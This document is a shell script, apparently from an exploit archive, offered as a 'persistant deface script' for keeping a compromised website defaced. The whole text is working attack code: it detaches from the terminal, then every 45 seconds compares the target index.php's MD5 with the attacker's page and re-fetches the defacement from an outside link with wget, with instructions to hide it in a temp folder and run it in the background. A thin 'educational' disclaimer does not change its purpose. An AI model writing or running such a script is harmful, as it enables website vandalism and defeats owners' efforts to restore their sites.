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#!/bin/sh# R00TW0RMs (|------------------------------------------## _______ _______ __ _______ #_______ \ _ \ \ _ \_/ |___ _ _\ _ \_______ _____ #\_ __ \/ /_\ \/ /_\ \ __\ \/ \/ / /_\ \_ __ \/ \ # | | \/\ \_/ \ \_/ \ | \ /\ \_/ \ | \/ Y Y \# |__| \_____ /\_____ /__| \/\_/ \_____ /__| |__|_| /# \/ \/ \/ \/### This was written for educational purpose and pentest only. # Use it at your own risk. Author will be not responsible for any damage!# Coder : th3breacher ||# Version : 0.1# Description: That's a persistant deface script that will let your target defaced even if the owner deletes ur deface x times :p# Usage : Simple , modify the script to your needs ,upload it to a hidden location maybe in a hidden folder within /temp make sure to #"chmod +x persistant" run it script as "./persistant & " # Tested on : linux(all)# Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, CrosS ( Xenu, Versus71,satsura, mich4th3c0wb0y, FInnH@X, Hooded Robin, s3rver.exe, Beyaz_Hacker, CyberZeist #(|------------------------------------------##-------------------------Start editing HERE#MD5 sum of your index.php deface , generate it with (md5sum index.php) make sure it's in php not txt defmd5="af2358088989a144354faf25a7a6c634"#The target deface location , change it as you wishdir="/home/target/public_html/index.php"#Your deface page location , it can be a dropbox public link to a txt deface taht will be saved as a php when teh script is launcheddefacelink=""#-------------------------Stop editingmd5offile =$(md5sum ${dir} | cut -d ' ' -f 1)mynohup(){# Close stdin, and make any read attempt an error if [ -t 0 ] then exec 0>/dev/null fi # Redirect stdout to a file if it's a TTY if [ -t 1 ] then exec 1>nohup.out if [ $? -ne 0 ] then exec 1>$HOME/nohup.out fi fi # Redirect stderr to stdout if it's a TTY if [ -t 2 ] then exec 2>&1 fi # Trap trap : HUP}main() {mynohupwhile true; doif [ ! -f $dir ] then wget -O $dir $defacelinkelif [ "$md5offile" == "$defmd5" ] then echo "none"elsewget -O $dir $defacelinkfi #default check time set to 45 seconds sleep 45done}main